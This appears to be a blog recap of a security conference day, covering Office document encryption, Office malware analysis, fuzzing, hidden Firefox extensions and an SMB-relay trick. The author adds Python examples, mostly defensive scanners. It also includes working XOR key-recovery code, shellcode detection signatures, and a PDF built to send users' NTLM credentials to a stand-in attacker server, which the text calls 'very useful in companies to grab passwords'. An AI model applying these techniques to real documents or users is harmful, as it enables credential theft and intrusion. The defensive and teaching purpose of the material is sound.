After some coffee and croissants, the second day started with a speech by the Minister of the Economy and Foreign Trade, Jeannot Krecké. He spoke about the importance of security awareness for the Internet and IT infrastructure, mentioning the Cyberworld Awareness Security Enhancement Structure (“CASES”) active in Luxembourg.
Due to family issues, Jose Nazario of Arbor Networks had to fly back to the United States at short notice. As a specialist in emerging Internet threats, he was scheduled to talk about politically motivated Denial of Service (DoS) attacks. Sad! At the last minute, Eric Filiol stepped in and presented an analysis of Word & Excel encryption. Attacks against Office documents combine forensic and cryptographic techniques. Documents are usually protected by the author with a simple password, and the default protection is weak: an XOR-based scheme with constant patterns (kept as the default to maintain compatibility with older versions). Stronger RC4 encryption can be enabled through the advanced settings. Breaking the protection starts with an analysis of the document structure itself, and such documents are often easy to find on USB sticks, in temporary directories, in caches, …
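To show why a constant-pattern XOR is weak, here is an added example (my own code, not Eric Filiol's and not from the talk). It obfuscates a constructed document-like blob with a repeating 16-byte key, then recovers the key from the two things a forensic look at the file gives you: a known signature at a known offset, and the long runs of 0x00 bytes that documents contain. The key length, the OLE signature used as known plaintext and the layout of the blob are assumptions for the demo; in a real .doc/.xls the OLE container itself is not obfuscated, and the known plaintext comes from the structures inside its streams.

```python
"""Recovering a repeating XOR key from a document-like blob (added example)."""
from collections import Counter

KEY_LEN = 16                       # assumption for the demo: key length is known
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # compound-file signature


def xor_obfuscate(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it a second time restores the data."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def key_from_known_plaintext(ct: bytes, known: dict, key_len: int) -> dict:
    """known maps offset -> plaintext bytes expected there (knowledge of the
    file format). Returns {key_index: key_byte} for the positions it fixes."""
    partial = {}
    for off, pt in known.items():
        for j, p in enumerate(pt):
            partial[(off + j) % key_len] = ct[off + j] ^ p
    return partial


def key_from_null_bytes(ct: bytes, key_len: int) -> dict:
    """Documents contain long runs of 0x00 (padding, unused fields), so for every
    key position the most frequent ciphertext byte is most likely key ^ 0x00."""
    return {i: Counter(ct[i::key_len]).most_common(1)[0][0] for i in range(key_len)}


def recover_key(ct: bytes, known: dict, key_len: int = KEY_LEN) -> bytes:
    """Statistics give a guess for every position; known plaintext overrides it."""
    guess = key_from_null_bytes(ct, key_len)
    guess.update(key_from_known_plaintext(ct, known, key_len))
    return bytes(guess[i] for i in range(key_len))


def build_sample() -> tuple:
    """Constructed 'document': signature, a little text, mostly zero padding."""
    body = b"Confidential memo: quarterly figures attached.".ljust(200, b"\x00")
    plaintext = OLE_MAGIC + body + bytes(range(32)) + b"\x00" * 300
    key = bytes.fromhex("5a7f0ce3914d26b8a0c7f13e6d9b40e2")   # constructed key
    return plaintext, key, xor_obfuscate(plaintext, key)


def demo() -> tuple:
    """(key recovered correctly?, full plaintext restored?)"""
    plaintext, key, ct = build_sample()
    recovered = recover_key(ct, {0: OLE_MAGIC})
    return recovered == key, xor_obfuscate(ct, recovered) == plaintext


if __name__ == "__main__":
    print(demo())
```

Once the key is known, decryption is the same XOR pass. Nothing of this carries over to the RC4 option: there is no repeating pattern to line up, which is why the talk singles out the default setting.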
The next slot also covered Office documents: “New advances in Office Malware analysis” by Frank Boldewin (the owner of reconstructer.org). He came back to another important attack vector: malicious “business” files like PDF or Office documents spread via e-mail or made available online. Exploits for MS Office (buffer overflows) have existed since 2006! Frank briefly explained how Office documents are stored and organised internally; the data can be parsed through the Win32 COM API. The shellcode and the executable (often encrypted) are embedded in the malicious document. Not much information is available on the subject at the moment. Tools to analyze malicious documents: DFView, Officecat, the FlexHex editor or OffVis. Another tool is the OfficeMalScanner suite created by Frank, which has several operating modes:
- Scan mode (Shellcode scanner)
- Info mode (dumps OLE structures, offsets, lengths)
- Inflate mode (decompresses documents – Office 2007 files are ZIP archives)
- MalHost-Setup, a shellcode runtime environment
A good practice would be to automatically scan all incoming documents with OfficeMalScanner…
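To make the scan/brute/inflate modes concrete, here is a small scanner of the same kind as an added example (my own code, not Frank Boldewin's OfficeMalScanner). The signature list is an illustrative subset of classic Win32 shellcode idioms (assumption: a real scanner carries far more), the brute-force step only tries single-byte XOR keys to uncover an encrypted executable, and the inflate step opens Office 2007 ZIP containers and scans each member. The document it scans is constructed inline.

```python
"""Shellcode / embedded-PE scanner in the spirit of OfficeMalScanner (added example)."""
import io
import re
import struct
import zipfile

# Illustrative subset of shellcode idioms (assumption: real scanners carry many more).
SIGNATURES = {
    "PEB access: mov eax, fs:[0x30]":     rb"\x64\xa1\x30\x00\x00\x00",
    "PEB access: mov eax, fs:[eax+0x30]": rb"\x64\x8b\x40\x30",
    "GetEIP: call $+5 / pop reg":         rb"\xe8\x00\x00\x00\x00[\x58-\x5f]",
    "GetEIP: fldz / fnstenv [esp-0xc]":   rb"\xd9\xee\xd9\x74\x24\xf4",
    "API hashing: ror edi, 0x0d":         rb"\xc1\xcf\x0d",
}


def scan_shellcode(data: bytes) -> list:
    """Scan mode: (offset, description) for every signature hit, sorted by offset."""
    hits = []
    for desc, pat in SIGNATURES.items():
        for m in re.finditer(pat, data):
            hits.append((m.start(), desc))
    return sorted(hits)


def find_pe(data: bytes) -> list:
    """Offsets of 'MZ' headers whose e_lfanew really points at a 'PE\\0\\0' signature."""
    found = []
    for m in re.finditer(rb"MZ", data):
        off = m.start()
        if off + 0x40 > len(data):
            continue
        e_lfanew = struct.unpack_from("<I", data, off + 0x3C)[0]
        if data[off + e_lfanew: off + e_lfanew + 4] == b"PE\x00\x00":
            found.append(off)
    return found


def brute_xor_pe(data: bytes) -> list:
    """Brute mode: try every single-byte XOR key, report (key, offset) of PE images."""
    results = []
    for key in range(1, 256):
        decoded = bytes(b ^ key for b in data)
        results += [(key, off) for off in find_pe(decoded)]
    return results


def scan_document(blob: bytes) -> dict:
    """Inflate mode plus scanning: a ZIP (Office 2007) container is opened and each
    member scanned; anything else is scanned as one flat byte stream."""
    if blob[:2] == b"PK":
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            members = {name: zf.read(name) for name in zf.namelist()}
    else:
        members = {"<raw>": blob}
    report = {}
    for name, data in members.items():
        found = {"shellcode": scan_shellcode(data),
                 "pe": find_pe(data),
                 "xor_pe": brute_xor_pe(data)}
        if any(found.values()):
            report[name] = found
    return report


def build_sample() -> bytes:
    """Constructed Office-2007-like document with a suspicious embedded object."""
    fake_pe = (b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)   # e_lfanew = 0x40
               + b"PE\x00\x00" + b"\x00" * 16)
    payload = (b"\x00" * 32
               + b"\xd9\xee\xd9\x74\x24\xf4"        # fldz / fnstenv: GetEIP trick
               + b"\x64\xa1\x30\x00\x00\x00"        # mov eax, fs:[0x30]
               + b"\xc1\xcf\x0d"                    # ror edi, 0x0d
               + bytes(b ^ 0x5A for b in fake_pe)   # PE image XOR-encoded with key 0x5A
               + b"\x00" * 32)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/embeddings/oleObject1.bin", payload)
    return buf.getvalue()


if __name__ == "__main__":
    for member, found in scan_document(build_sample()).items():
        print(member, found)
```

The raw scan finds the three shellcode idioms but no PE header, because the executable is encoded; the brute-force pass then reports key 0x5A and the offset of the hidden image. That two-step result is exactly the hint a reviewer needs before handing the blob to a runtime environment such as MalHost-Setup.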
After the coffee break, Gabriel Campana presented his tool Fuzzgrind. “Fuzzing” became a hot topic at security conferences this year; last week, during the RSA Conference in London, another tool was presented. How can we define “fuzzing”? “It is a testing technique that provides invalid, unexpected, or random data to the inputs of a program.” Fuzzgrind is built on two tools: Valgrind and STP. Valgrind is a framework for dynamic binary instrumentation that supports multiple architectures; it lets you profile and instrument your application (one of its well-known tools is memcheck). STP is a constraint solver: the instrumentation records the conditions on input bytes that a run went through, and the solver produces new inputs that take the other branch of each condition. On top of these, a set of Python scripts ties the two tools together. In real life, Fuzzgrind was successfully used to discover bugs in readelf, swfextract and libtiff.
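The reason a fuzzer wants a constraint solver is easier to see on a toy. The following added example (my own code, not Gabriel Campana's Fuzzgrind) replays the loop in pure Python: a Python int subclass stands in for Valgrind's instrumentation and records every comparison made on an input byte, a constructed parser with a divide-by-zero bug stands in for readelf, and a tiny solver that only handles single-byte comparisons stands in for STP (which solves arbitrary bit-vector constraints). These stand-ins are assumptions for the demo; the search strategy (negate one recorded constraint, re-run, repeat) is the technique itself.

```python
"""Toy concolic fuzzer in the Fuzzgrind style (added example)."""


class TByte(int):
    """An input byte that records every comparison made against it."""
    def __new__(cls, value, index, trace):
        obj = int.__new__(cls, value)
        obj.index, obj.trace = index, trace
        return obj

    def _cmp(self, op, other, outcome):
        self.trace.append((self.index, op, int(other), outcome))
        return outcome

    def __eq__(self, o): return self._cmp("==", o, int(self) == int(o))
    def __ne__(self, o): return self._cmp("!=", o, int(self) != int(o))
    def __gt__(self, o): return self._cmp(">", o, int(self) > int(o))
    def __lt__(self, o): return self._cmp("<", o, int(self) < int(o))
    __hash__ = int.__hash__


def target(data: bytes, trace: list) -> str:
    """Constructed parser under test: magic, class byte, section count.
    The bug: the section count is never checked for zero before dividing."""
    b = [TByte(v, i, trace) for i, v in enumerate(data)]
    if len(b) < 8:
        return "too short"
    if b[0] != 0x7F or b[1] != 0x45 or b[2] != 0x4C or b[3] != 0x46:
        return "bad magic"
    if b[4] != 2:
        return "unsupported class"
    sections = b[5]
    if sections > 6:
        return "too many sections"
    return "ok, %d bytes per section" % (100 // sections)   # ZeroDivisionError when 0


def solve_negated(inp: bytes, constraint: tuple):
    """Toy solver: build an input that flips one recorded comparison.
    Returns None when no byte value can do it (e.g. '> 255')."""
    idx, op, k, outcome = constraint
    want = not outcome
    value = {"==": k if want else (k + 1) % 256,
             "!=": (k + 1) % 256 if want else k,
             ">":  k + 1 if want else k,
             "<":  k - 1 if want else k}[op]
    if not 0 <= value <= 255:
        return None
    out = bytearray(inp)
    out[idx] = value
    return bytes(out)


def concolic_fuzz(seed: bytes, max_runs: int = 1000):
    """Depth-first generational search. Returns (crashing_input, runs)."""
    stack, seen, runs = [seed], {seed}, 0
    while stack and runs < max_runs:
        inp, trace = stack.pop(), []
        runs += 1
        try:
            target(inp, trace)
        except ZeroDivisionError:
            return inp, runs
        for constraint in trace:                     # later constraints are pushed last,
            child = solve_negated(inp, constraint)   # so the deepest branch is tried first
            if child is not None and child not in seen:
                seen.add(child)
                stack.append(child)
    return None, runs


if __name__ == "__main__":
    crash, runs = concolic_fuzz(b"\x00" * 8)
    print(crash, runs)   # b'\x7fELF\x02\x00\x00\x00' 6
```

Starting from eight zero bytes, the search passes the four-byte magic and the class check in six executions, one per negated comparison; random mutation would need on the order of 2^32 attempts to get past the magic alone. Real tools differ in two ways that matter in practice: the solver must satisfy the whole path prefix, not just the one flipped condition, and the instrumentation must follow input bytes through arithmetic and memory, which is the part Valgrind does.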
The next presentation was about fun with Firefox extension malware (the scheduled talk on side-channel attacks, “Sniff Keystrokes With Lasers/Voltmeters”, was also cancelled at the last minute). Candid Wüest went back over Firefox and its extensions: how they work and how they are developed (XPI files). One of the first issues is that XPI files are unsigned. With 17 million extension downloads per day and 150 new extensions per day, extensions are a good attack vector. What can a malicious extension do? EVERYTHING. There are several classic ways to end up with a malicious extension (obscure sources, social engineering, …). Note that an extension can be hidden from the Add-ons Manager using the “hidden” tag in its install.rdf file. Good extensions can also be hijacked! Candid showed a live demo of a fully hidden extension loaded into Firefox: after each launch of the browser, a calc.exe popped up!
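Since a hidden extension will not show up in the Add-ons Manager, the check has to be done on disk. The following added example (my own code, not Candid Wüest's) walks a profile's extensions directory, reads each install.rdf (from unpacked directories and from packed .xpi archives, which are ZIP files) using the RDF/XML namespaces Firefox used for these manifests, and flags every extension carrying the em:hidden flag, whether written as a child element or as an attribute. The profile it scans is a constructed one written to a temporary directory.

```python
"""Audit Firefox extensions on disk for the em:hidden flag (added example)."""
import os
import tempfile
import zipfile
import xml.etree.ElementTree as ET

RDF_NS = "http://www.w3.org/1999/02/22-rdf-syntax-ns#"
EM_NS = "http://www.mozilla.org/2004/em-rdf#"


def parse_install_rdf(xml_bytes: bytes) -> dict:
    """Extract id, name and the hidden flag. RDF/XML allows a property either as a
    child element (<em:hidden>true</em:hidden>) or as an attribute on the
    Description node (em:hidden="true"); both forms are checked."""
    root = ET.fromstring(xml_bytes)
    desc = root.find("{%s}Description" % RDF_NS)
    if desc is None:
        return {}

    def prop(name):
        el = desc.find("{%s}%s" % (EM_NS, name))
        if el is not None and el.text:
            return el.text.strip()
        return desc.get("{%s}%s" % (EM_NS, name))

    return {"id": prop("id"), "name": prop("name"),
            "hidden": (prop("hidden") or "").lower() == "true"}


def audit_extensions(extensions_dir: str) -> list:
    """One record per extension found on disk, whatever the Add-ons Manager shows."""
    records = []
    for entry in sorted(os.listdir(extensions_dir)):
        path = os.path.join(extensions_dir, entry)
        manifest = None
        if os.path.isdir(path) and os.path.isfile(os.path.join(path, "install.rdf")):
            with open(os.path.join(path, "install.rdf"), "rb") as f:
                manifest = f.read()
        elif entry.lower().endswith(".xpi") and zipfile.is_zipfile(path):
            with zipfile.ZipFile(path) as zf:
                if "install.rdf" in zf.namelist():
                    manifest = zf.read("install.rdf")
        if manifest is None:
            continue
        info = parse_install_rdf(manifest)
        info["path"] = path
        records.append(info)
    return records


def hidden_extensions(extensions_dir: str) -> list:
    """IDs of the extensions that ask to be hidden."""
    return [r["id"] for r in audit_extensions(extensions_dir) if r["hidden"]]


MANIFEST = """<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
     xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <Description about="urn:mozilla:install-manifest"%s>
    <em:id>%s</em:id>
    <em:name>%s</em:name>
    <em:version>1.0</em:version>%s
  </Description>
</RDF>
"""


def build_sample_profile() -> str:
    """Constructed extensions directory: one honest extension, one hidden via a
    child element, one hidden via an attribute inside a packed .xpi."""
    ext_dir = os.path.join(tempfile.mkdtemp(), "extensions")
    os.makedirs(os.path.join(ext_dir, "honest@example.com"))
    with open(os.path.join(ext_dir, "honest@example.com", "install.rdf"), "w") as f:
        f.write(MANIFEST % ("", "honest@example.com", "Honest Helper", ""))
    os.makedirs(os.path.join(ext_dir, "sneaky@example.com"))
    with open(os.path.join(ext_dir, "sneaky@example.com", "install.rdf"), "w") as f:
        f.write(MANIFEST % ("", "sneaky@example.com", "Sneaky",
                            "\n    <em:hidden>true</em:hidden>"))
    with zipfile.ZipFile(os.path.join(ext_dir, "packed@example.com.xpi"), "w") as zf:
        zf.writestr("install.rdf",
                    MANIFEST % (' em:hidden="true"', "packed@example.com", "Packed", ""))
    return ext_dir


if __name__ == "__main__":
    for rec in audit_extensions(build_sample_profile()):
        print(("HIDDEN " if rec["hidden"] else "       ") + rec["id"], rec["path"])
```

On a real machine, point audit_extensions at the profile's extensions directory and at the application-wide extension locations, since an extension dropped outside the profile never appears in the user's own list either. The flag was honoured by the Firefox 3.x versions current at the time and dropped in later releases, so a hit is worth a look regardless of whether the browser still obeys it.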
After the lunch break, a lightning-talks session (maximum 10 minutes per topic) was held.
- Didier Stevens spoke about “Windows 7: ROT13 or Vigenère?”, i.e. how entries in the registry (like the history of launched applications) are encoded.
- Eric Filiol was back with the results of the iAWACS 2009 contest on finding weak points in antivirus programs.
- Fernando Gont presented the latest updates of his research on TCP security.
- Guillaume Delugré presented his Origami PDF framework, used to write malicious PDF files, with a small demo of an IRC session embedded in a PDF file 😉
- Finally, Moxie Marlinspike presented a useful tool for all of us: knockknock
Eric Filiol (again ;-)) and Eddy Deligne presented Perseus, a coding-theory-based Firefox plug-in to counter botnet activity. Data collection is important during attacks (botnets), but beyond attacks, what about privacy concerns or local issues like the HADOPI law in France? The proposed solution is to adopt “noisy coding” instead of encryption.
As cryptography can be prohibited by law in some countries, Perseus works like HTTPS but encodes (by adding noise) all traffic between the browser and the server. If a bad guy intercepts the traffic, he must first reconstruct the data, which consumes a lot of resources. Source code and documentation are available on mozdev.org. To communicate with the extension, the server must be able to understand “noisy” requests; this is done via an Apache module (to be released soon).
The next track covered HostileWRT, a “Fully-Automated Wireless Security Audit Platform on Embedded Hardware”, by Philippe Langlois and Eugene Parkinson (from /tmp/lab). They presented the same talk during FRHACK in Besançon in September (see my previous post).
Another nice one: SMB relay & PDF files. Via Origami, add a URL to the PDF file pointing to \\a.fake.server.com\file.tmp. When the document is opened, the reader tries to reach the share and the user's credentials are sent to the attacker's SMB server (without any warning); the grabbed NTLM challenge-response hash can then be cracked offline with John the Ripper. Bingo! (very useful in companies to grab passwords). Conclusion, as always: take care and do not trust anybody.
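A check for this on the defender's side, as an added example (my own code, neither from the talk nor from Origami): it builds a minimal, constructed PDF (no xref table, it only serves as scanner input) whose /OpenAction is a /URI pointing at \\a.fake.server.com\file.tmp, then scans the raw PDF text for URI, Launch and GoToR actions whose target is a UNC path or a file: URL. The PDF string escaping and the action dictionaries follow the PDF syntax; the sample document and the list of flagged action types are assumptions for the demo.

```python
r"""Flag PDF actions that point at a UNC path or file: URL (added example)."""
import re

UNC_TARGET = r"\\a.fake.server.com\file.tmp"   # target used in the talk


def pdf_string(s: str) -> str:
    """Encode s as a PDF literal string: backslashes and parentheses are escaped."""
    return "(" + s.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)") + ")"


def build_sample_pdf(target: str = UNC_TARGET) -> bytes:
    """Constructed minimal PDF whose open action is a URI pointing at target."""
    body = (
        "%PDF-1.4\n"
        "1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
        "2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
        "3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n"
        "4 0 obj << /S /URI /URI " + pdf_string(target) + " >> endobj\n"
        "trailer << /Root 1 0 R >>\n%%EOF\n"
    )
    return body.encode("latin-1")


_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f",
            "(": "(", ")": ")", "\\": "\\"}


def unescape_pdf_string(raw: str) -> str:
    r"""Undo PDF literal-string escapes: \\ \( \) \n \r \t \b \f and \ddd octal."""
    out, i = [], 0
    while i < len(raw):
        c = raw[i]
        if c == "\\" and i + 1 < len(raw):
            nxt = raw[i + 1]
            if nxt in _ESCAPES:
                out.append(_ESCAPES[nxt])
                i += 2
                continue
            m = re.match(r"[0-7]{1,3}", raw[i + 1:])
            if m:
                out.append(chr(int(m.group(), 8)))
                i += 1 + len(m.group())
                continue
        out.append(c)
        i += 1
    return "".join(out)


# An action dictionary starts with /S /<type>; its target sits in /URI (...) or /F (...).
_ACTION_RE = re.compile(r"/S\s*/(URI|Launch|GoToR)\b(.*?)>>", re.S)
_STRING_RE = re.compile(r"/(URI|F)\s*\(((?:\\.|[^\\)])*)\)", re.S)


def find_remote_actions(pdf: bytes) -> list:
    """(action, target, reason) for actions that can make the reader open a
    network path: UNC targets, file: URLs, or any Launch action at all."""
    text = pdf.decode("latin-1")
    findings = []
    for m in _ACTION_RE.finditer(text):
        action, dict_body = m.group(1), m.group(2)
        for s in _STRING_RE.finditer(dict_body):
            target = unescape_pdf_string(s.group(2))
            if target.startswith("\\\\"):
                findings.append((action, target, "UNC path"))
            elif target.lower().startswith("file:"):
                findings.append((action, target, "file: URL"))
            elif action == "Launch":
                findings.append((action, target, "Launch action"))
    return findings


if __name__ == "__main__":
    for finding in find_remote_actions(build_sample_pdf()):
        print(finding)   # ('URI', '\\\\a.fake.server.com\\file.tmp', 'UNC path')
```

Two caveats for real use: the scanner reads the raw file, so actions hidden in compressed object streams or in an encrypted PDF need decompressing or decrypting first (Origami does that), and the content check only catches the file. The leak itself is stopped at the network: blocking outbound SMB (TCP 445 and 139) at the perimeter means a reader that does follow the link never reaches the attacker's server.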
That’s all for today…